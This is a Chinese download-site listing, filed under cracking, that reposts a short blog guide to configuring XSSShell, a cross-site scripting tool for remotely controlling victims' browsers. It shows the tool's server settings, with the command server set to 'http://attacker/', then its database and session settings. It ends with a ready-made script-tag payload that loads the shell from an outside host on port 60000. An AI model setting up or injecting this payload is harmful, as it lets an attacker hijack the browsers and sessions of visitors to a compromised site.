XSSShell配置.txt
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:1k
源码类别:

破解

开发平台:

ASP/ASPX

  1. XSSShell配置 
  2. Posted by cince at 17:52 | Hacker | Comments(0) | Reads(73) 
  3. Trackback URI: 
  4. Note: The trackback url will expire after 23:59:59 today
  5. 1.XSSShell.asp的配置
  6.   打开xssshell.asp,找到“SERVER CONFIG”部分,代码如下所示。
  7.   // You XSSShell Server
  8.   var SERVER = "http://attacker/";
  9.   // This file's name
  10.   var ME = SERVER + "xssshell.asp?p=1" ;
  11.   // Connector file (can be in php, cfm, pl etc. just stick with implementation)
  12.   var CONNECTOR = SERVER + "xssshell/connector.asp";
  13.   // Commands file (can be in php, cfm, pl etc. just stick with implementation)
  14.   var COMMANDS_URL = SERVER + "xssshell/commands.asp";
  15. 2.XSSShell/db.asp的配置
  16.   这里主要修改数据库的路径和进入管理的密码。
  17.   ' Password protection added
  18.   Option Explicit
  19.   '60 minutes
  20.   Session.Timeout = 60
  21.   'Open In Live Enviroments
  22.   'On error resume next
  23.   '// DATABASE CONFIGURATION
  24.   Const DBPATH = "..dbshell.mdb"
  25.   'Activity check time as seconds
  26.   Const Activity = "10"
  27.   Const SQLSERVER = False
  28. 3.使用XSSShell:
  29. <script src="http://winjia.gicp.net:60000/xssshell.asp?v=336699"></script>